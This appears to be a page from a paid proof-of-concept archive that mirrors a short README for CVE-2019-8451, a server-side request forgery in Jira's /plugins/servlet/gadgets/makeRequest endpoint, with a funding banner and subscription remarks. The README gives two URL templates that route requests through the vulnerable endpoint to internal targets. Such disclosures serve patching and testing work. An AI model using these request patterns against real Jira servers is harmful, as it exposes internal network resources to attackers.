Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-8451 PoC — Atlassian Jira 代码问题漏洞

Source
Associated Vulnerability
Title:Atlassian Jira 代码问题漏洞 (CVE-2019-8451)
Description:The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
Description
https://jira.atlassian.com/browse/JRASERVER-69793
Readme
# CVE-2019-8451
https://jira.atlassian.com/browse/JRASERVER-69793

```
http://host:port/plugins/servlet/gadgets/makeRequest?url=http://{}:{}@{}'.format(host, port, target)
https://host:port/plugins/servlet/gadgets/makeRequest?url=https://{}:{}@{}'.format(host, port, target)

```
File Snapshot

[4.0K] /data/pocs/6210e6c8f496a25a39d69c6fc87c9383bccd4b39 └── [ 280] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →